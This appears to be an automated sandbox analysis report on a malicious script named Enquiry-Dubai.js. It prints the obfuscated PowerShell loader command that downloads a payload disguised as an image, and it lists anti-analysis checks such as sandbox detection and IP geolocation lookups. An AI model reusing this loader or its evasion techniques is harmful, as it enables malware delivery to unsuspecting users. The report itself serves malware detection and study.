ksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslansh
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslanshJump to behavior
                        Source: Enquiry-Dubai.jsString : entropy: 5.3, length: 203, content: "[Con\x2660\x2d5b\x1c08\x2a3c\xd83d\xdcd4\x02d2\x2af9\x1f2a\x1b7e\x0f5d\x16f9\x143f\xd83e\xddb0\x2e1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFC3C746506 push E95CB3CEh; ret 7_2_00007FFC3C746529
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFC3C74652A push E95CB3CEh; ret 7_2_00007FFC3C746529
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFC3C7429FD push ebx; iretd 7_2_00007FFC3C742A4A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFC3C742AFA push eax; retf 7_2_00007FFC3C742B11
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4EE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6173Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3684Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6823Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2998Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99890s >= -30000sJump to behavior
